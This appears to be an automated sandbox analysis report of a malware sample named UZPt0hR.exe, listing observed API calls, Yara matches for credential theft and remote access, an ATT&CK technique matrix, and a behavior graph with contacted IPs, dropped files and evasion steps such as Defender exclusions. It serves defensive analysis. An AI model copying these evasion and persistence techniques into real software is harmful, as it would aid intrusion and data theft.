                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00407FE0 RegCreateKeyExW,RegCloseKey,_memset,GetSystemTime,SystemTimeToFileTime,0_2_00407FE0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C495AD0 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,RtlGetVersion,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,5_2_000002684C495AD0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0083D80C _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_0083D80C
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C49F6DC HeapCreate,GetVersion,HeapSetInformation,5_2_000002684C49F6DC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2447683081.000002684C4A8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UZPt0hR.exe PID: 6220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4900, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2447683081.000002684C4A8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UZPt0hR.exe PID: 6220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4900, type: MEMORYSTR
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007F92C4 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,__swprintf_l,send,recv,closesocket,closesocket,closesocket,closesocket,15_2_007F92C4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007E8C10 htons,bind,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,15_2_007E8C10
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts2
                    Native API
                    1
                    Scripting
                    1
                    Exploitation for Privilege Escalation
                    1
                    Disable or Modify Tools
                    11
                    Input Capture
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    14
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    2
                    LSASS Driver
                    1
                    Abuse Elevation Control Mechanism
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol11
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading
                    2
                    LSASS Driver
                    1
                    Abuse Elevation Control Mechanism
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    NTDS225
                    System Information Discovery
                    Distributed Component Object ModelInput Capture124
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd11
                    Registry Run Keys / Startup Folder
                    1
                    Access Token Manipulation
                    2
                    Software Packing
                    LSA Secrets441
                    Security Software Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Windows Service
                    1
                    DLL Side-Loading
                    Cached Domain Credentials121
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items311
                    Process Injection
                    11
                    File Deletion
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job11
                    Registry Run Keys / Startup Folder
                    1
                    Masquerading
                    Proc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Modify Registry
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
                    Virtualization/Sandbox Evasion
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Access Token Manipulation
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
                    Process Injection
                    KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1657767 Sample: UZPt0hR.exe Startdate: 06/04/2025 Architecture: WINDOWS Score: 100 52 grabify.link 2->52 54 edge.geo.kaspersky.com 2->54 56 devbuilds.s.kaspersky-labs.com 2->56 72 Suricata IDS alerts for network traffic 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 10 other signatures 2->78 10 UZPt0hR.exe 3 1 2->10         started        signatures3 process4 signatures5 96 Query firmware table information (likely to detect VMs) 10->96 98 Contains functionality to inject code into remote processes 10->98 100 Adds a directory exclusion to Windows Defender 10->100 102 4 other signatures 10->102 13 svchost.exe 3 7 10->13         started        18 cmd.exe 1 10->18         started        process6 dnsIp7 64 82.29.67.160, 443, 49694, 49699 NTLGB United Kingdom 13->64 66 grabify.link 104.26.9.202, 443, 49695, 49698 CLOUDFLARENETUS United States 13->66 68 107.174.192.179, 49692, 80 AS-COLOCROSSINGUS United States 13->68 46 C:\Users\user\AppData\Local\...\w32tm.exe, PE32+ 13->46 dropped 48 C:\ProgramData\...\tzutil.exe, PE32+ 13->48 dropped 50 C:\Users\user\AppData\Local\Temp\...\set.bat, PNG 13->50 dropped 104 Benign windows process drops PE files 13->104 106 Creates autostart registry keys with suspicious names 13->106 108 Deletes itself after installation 13->108 110 Searches for specific processes (likely to inject) 13->110 20 tzutil.exe 7 4 13->20         started        25 w32tm.exe 6 13->25         started        27 cmd.exe 1 13->27         started        112 Adds a directory exclusion to Windows Defender 18->112 29 powershell.exe 23 18->29         started        31 conhost.exe 18->31         started        file8 signatures9 process10 dnsIp11 58 104.168.28.10, 49707, 49710, 49713 AS-COLOCROSSINGUS United States 20->58 60 127.0.0.1 unknown unknown 20->60 44 C:\Windows\Temp\K47ZW3T_7928.sys, PE32+ 20->44 dropped 80 Query firmware table information (likely to detect VMs) 20->80 82 Adds a directory exclusion to Windows Defender 20->82 84 Sample is not signed and drops a device driver 20->84 86 Found direct / indirect Syscall (likely to bypass EDR) 20->86 33 powershell.exe 23 20->33         started        36 powershell.exe 23 20->36         started        62 edge.geo.kaspersky.com 4.28.136.57, 443, 49736, 49741 LEVEL3US United States 25->62 88 Multi AV Scanner detection for dropped file 25->88 90 Creates HTML files with .exe extension (expired dropper behavior) 25->90 92 Tries to evade analysis by execution special instruction (VM detection) 25->92 38 conhost.exe 27->38         started        94 Loading BitLocker PowerShell Module 29->94 file12 signatures13 process14 signatures15 70 Loading BitLocker PowerShell Module 33->70 40 conhost.exe 33->40         started        42 conhost.exe 36->42         started        process16

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.